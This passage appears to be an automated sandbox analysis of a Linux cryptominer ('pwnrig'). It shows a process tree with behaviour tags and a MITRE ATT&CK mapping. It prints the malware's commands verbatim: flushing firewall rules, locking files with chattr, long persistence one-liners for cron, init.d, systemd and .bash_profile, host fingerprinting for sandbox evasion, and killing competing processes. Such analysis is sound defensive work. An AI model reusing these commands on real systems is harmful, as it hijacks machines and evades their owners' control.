      PID:1706
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1708
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1709
- /usr/bin/bash
  bash -c "iptables -P INPUT ACCEPT"
  2⤵
  PID:1711
- /usr/sbin/iptables
  iptables -P INPUT ACCEPT
  2⤵
  PID:1711
- /usr/bin/bash
  bash -c "iptables -P OUTPUT ACCEPT"
  2⤵
  PID:1713
- /usr/sbin/iptables
  iptables -P OUTPUT ACCEPT
  2⤵
  PID:1713
- /usr/bin/bash
  bash -c "iptables -P FORWARD ACCEPT"
  2⤵
  PID:1715
- /usr/sbin/iptables
  iptables -P FORWARD ACCEPT
  2⤵
  PID:1715
- /usr/bin/bash
  bash -c "iptables -F"
  2⤵
  PID:1717
- /usr/sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1717
- /usr/bin/bash
  bash -c "chattr -ia /etc/ld.so.preload"
  2⤵
  PID:1718
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:1718
- /usr/bin/pgrep
  pgrep -f klibsystem4
  2⤵
  - Reads CPU attributes
  PID:1719
- /usr/bin/pgrep
  pgrep -f klibsystem5
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1720
- /usr/bin/chattr
  chattr +ia /etc/init.d/knlib
  2⤵
  - Attempts to change immutable files
  PID:1721
- /etc/init.d/knlib
  /etc/init.d/knlib start
  2⤵
  - Executes dropped EXE
  PID:1722
- - /usr/bin/cp
    cp -f -r -- /bin/knlib5 /bin/klibsystem5
    3⤵
    PID:1723
- - /usr/bin/rm
    rm -rf -- klibsystem5
    3⤵
    PID:1725
- /usr/bin/chattr
  chattr +ia /etc/systemd/system/knlibe.service
  2⤵
  - Attempts to change immutable files
  PID:1726
- /usr/bin/systemctl
  systemctl daemon-reload
  2⤵
  - Reads EFI boot settings
  PID:1727
- /usr/bin/systemctl
  systemctl enable knlibe.service
  2⤵
  - Reads EFI boot settings
  - Enumerates kernel/hardware configuration
  PID:1753
- /usr/bin/chattr
  chattr +ia /bin/knlib5
  2⤵
  - Attempts to change immutable files
  PID:1795
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:1796

/usr/bin/nohup
nohup ./klibsystem5
1⤵
PID:1724

/usr/bin/klibsystem5
./klibsystem5
1⤵
PID:1724

/usr/bin/pkill
pkill -f .klibsystem5
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1797

/usr/bin/pkill
pkill -f .klibsystem4
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1798

/usr/bin/bash
bash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"
1⤵
PID:1799
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:1801

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:1802

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:1803

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:1804

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:1805

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:1806

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
1⤵
- Attempts to change immutable files
PID:1807

/usr/bin/chattr
chattr -ia /etc/anacrontab
1⤵
- Attempts to change immutable files
PID:1808

/usr/bin/chattr
chattr +ia /etc/anacrontab
1⤵
- Attempts to change immutable files
PID:1809

/tmp/sys-helper
/tmp/sys-helper
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1810

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:1812
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  - Attempts to change immutable files
  PID:1813
- - /usr/bin/whoami
    whoami
    3⤵
    PID:1824
- - /usr/bin/hostname
    hostname
    3⤵
    PID:1825
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:1826
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:1842
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:1844
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1843
- - /usr/bin/id
    id -u
    3⤵
    PID:1846
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:1849
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:1848
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1847
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
  2⤵
  - Attempts to change immutable files
  - Writes file to tmp directory
  PID:1851
- - /usr/bin/id
    id -u
    3⤵
    PID:1852
- - /usr/bin/id
    id -u
    3⤵
    PID:1853
- - /usr/bin/chattr
    chattr -i -a /bin/bprofr "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:1854
- - /usr/bin/rm
    rm -rf /bin/bprofr
    3⤵
    PID:1855
- - /usr/bin/sed
    sed -i /bprofr/d "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:1856
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/bprofr
    3⤵
    - Writes file to system bin folder
    PID:1857
- - /usr/bin/id
    id -u
    3⤵
    PID:1858
- - /usr/bin/chattr
    chattr +i +a /bin/bprofr "~/.bash_profile"
    3⤵
    - Attempts to change immutable files
    PID:1859
- - /usr/bin/mkdir
    mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
    3⤵
    PID:1860
- - /usr/bin/chattr
    chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
    3⤵
    - Attempts to change immutable files
    PID:1861
- - /usr/bin/rm
    rm -rf /bin/crondr
    3⤵
    PID:1862
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/crondr
    3⤵
    - Writes file to system bin folder
    PID:1863
- - /usr/bin/tee
    tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Creates/modifies Cron job
    PID:1876
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
    3⤵
    - Attempts to change immutable files
    - Creates/modifies Cron job
    PID:1877
- - /usr/bin/chmod
    chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    PID:1878
- - /usr/bin/chattr
    chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
    3⤵
    - Attempts to change immutable files
    PID:1879
- - /usr/bin/which
    which chkconfig
    3⤵
    PID:1880
- - /usr/bin/which
    which update-rc.d
    3⤵
    PID:1881
- - /usr/bin/chattr
    chattr -i -a /etc/init.d/pwnrig /bin/initdr
    3⤵
    - Attempts to change immutable files
    PID:1882
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig disable
    3⤵
    - Flushes firewall rules
    PID:1883
- - /usr/sbin/update-rc.d
    update-rc.d -f pwnrig remove
    3⤵
    PID:1884
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1885
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1885
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1885
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:1885
- - /usr/bin/rm
    rm -rf /bin/initdr
    3⤵
    PID:1911
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/initdr
    3⤵
    - Writes file to system bin folder
    PID:1912
- - /usr/bin/tee
    tee /etc/init.d/pwnrig
    3⤵
    - Modifies init.d
    PID:1914
- - /usr/bin/sed
    sed -i "1 s/-e //" /etc/init.d/pwnrig
    3⤵
    - Attempts to change immutable files
    - Modifies init.d
    PID:1915
- - /usr/bin/chmod
    chmod +x /etc/init.d/pwnrig /bin/initdr
    3⤵
    PID:1916
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig defaults
    3⤵
    PID:1917
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1918
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1918
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1918
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      Enumerates kernel/hardware configuration
      PID:1918
- - /usr/sbin/update-rc.d
    update-rc.d pwnrig enable
    3⤵
    PID:1944
  - - /usr/local/sbin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:1945
  - - /usr/local/bin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:1945
  - - /usr/sbin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      PID:1945
  - - /usr/bin/systemctl
      systemctl --quiet enable pwnrig
      4⤵
      Reads EFI boot settings
      Enumerates kernel/hardware configuration
      PID:1945
  - - /usr/local/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1946
  - - /usr/local/bin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1946
  - - /usr/sbin/systemctl
      systemctl daemon-reload
      4⤵
      PID:1946
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      Enumerates kernel/hardware configuration
      PID:1946
- - /usr/bin/chattr
    chattr +i +a /etc/init.d/pwnrig /bin/initdr
    3⤵
    - Attempts to change immutable files
    PID:1972
- - /usr/bin/which
    which systemctl
    3⤵
    PID:1973
- - /usr/bin/chattr
    chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    - Attempts to change immutable files
    PID:1974
- - /usr/bin/rm
    rm -rf /bin/sysdr
    3⤵
    PID:1975
- - /usr/bin/cp
    cp -f -r -- /tmp/service-agent /bin/sysdr
    3⤵
    - Writes file to system bin folder
    PID:1976
- - /usr/bin/tee
    tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    - Modifies systemd
    PID:1978
- - /usr/bin/sed
    sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
    3⤵
    - Attempts to change immutable files
    PID:1979
- - /usr/bin/chattr
    chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
    3⤵
    - Attempts to change immutable files
    PID:1980
- - /usr/bin/systemctl
    systemctl enable pwnrige.service
    3⤵
    - Reads EFI boot settings
    PID:1981
- - /usr/bin/systemctl
    systemctl enable pwnrigl.service
    3⤵
    - Reads EFI boot settings
    PID:2008
- - /usr/bin/systemctl
    systemctl daemon-reload
    3⤵
    - Reads EFI boot settings
    PID:2034
- - /usr/bin/systemctl
    systemctl reload-or-restart pwnrige.service
    3⤵
    - Reads EFI boot settings
    - Enumerates kernel/hardware configuration
    PID:2060

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:1816

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:1818

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:1823

/usr/bin/head
head -n 1
1⤵
PID:1822

/usr/bin/grep
grep "Port "
1⤵
PID:1821

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:1820

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:1832

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:1831

/usr/bin/cut
cut -d: -f2
1⤵
PID:1830

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:1829

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:1835

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:1838

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:1841

/tmp/service-agent
/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:2117
- /bin/sh
  sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
  2⤵
  - Attempts to change immutable files
  PID:2141
- - /usr/bin/whoami
    whoami
    3⤵
    PID:2152
- - /usr/bin/hostname
    hostname
    3⤵
    PID:2153
- - /usr/bin/grep
    grep -c "^processor" /proc/cpuinfo
    3⤵
    - Checks CPU configuration
    PID:2154
- /bin/sh
  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:2170
- - /usr/bin/awk
    awk "/[zZ]/ && !a[\$2]++ {print \$2}"
    3⤵
    PID:2172
- - /usr/bin/ps
    ps -A "-ostat,ppid"
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2171
- - /usr/bin/id
    id -u
    3⤵
    PID:2174
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2177
- - /usr/bin/grep
    grep /etc/cron
    3⤵
    PID:2176
- - /usr/bin/ps
    ps x
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2175
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
  2⤵
  PID:2179
- - /usr/bin/id
    id -u
    3⤵
    PID:2180
- - /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    3⤵
    PID:2185
- - /usr/bin/grep
    grep -v /usr/sbin/httpd
    3⤵
    PID:2184
- - /usr/bin/grep
    grep -v -- "-bash[[:space:]]*\$"
    3⤵
    PID:2183
- - /usr/bin/grep
    grep -v grep
    3⤵
    PID:2182
- - /usr/bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:2181
- /bin/sh
  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
  2⤵
  PID:2187
- - /usr/bin/id
    id -u
    3⤵
    PID:2188

/usr/bin/hostname
hostname -I
1⤵
- Attempts to change immutable files
PID:2144

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2146

/usr/bin/awk
awk "{print \"-\"\$2}"
1⤵
PID:2151

/usr/bin/head
head -n 1
1⤵
PID:2150

/usr/bin/grep
grep "Port "
1⤵
PID:2149

/usr/bin/cat
cat /etc/ssh/sshd_config
1⤵
PID:2148

/usr/bin/sed
sed -e "s/\$//"
1⤵
PID:2160

/usr/bin/sed
sed -e "s/^ *//"
1⤵
PID:2159

/usr/bin/cut
cut -d: -f2
1⤵
PID:2158

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
1⤵
- Checks CPU configuration
PID:2157

/usr/bin/awk
awk "{print \$1}"
1⤵
PID:2163

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2166

/usr/bin/awk
awk "{print \$4}"
1⤵
PID:2169

/usr/bin/wc
wc -l
1⤵
PID:2194

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
1⤵
PID:2193

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
1⤵
PID:2192

/usr/bin/grep
grep -v grep
1⤵
PID:2191

/usr/bin/ps
ps aux
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:2190

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

Virtualization/Sandbox Evasion